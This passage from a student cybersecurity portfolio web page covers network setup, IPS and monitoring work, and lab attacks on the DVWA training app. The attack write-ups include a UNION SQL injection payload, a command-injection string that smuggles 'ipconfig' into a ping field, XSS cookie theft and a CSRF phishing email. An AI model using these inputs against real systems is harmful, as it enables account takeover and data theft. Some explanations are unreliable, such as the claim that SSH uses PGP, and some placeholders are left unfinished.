          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
          <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
           any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
          <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
           the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
           <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
           </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
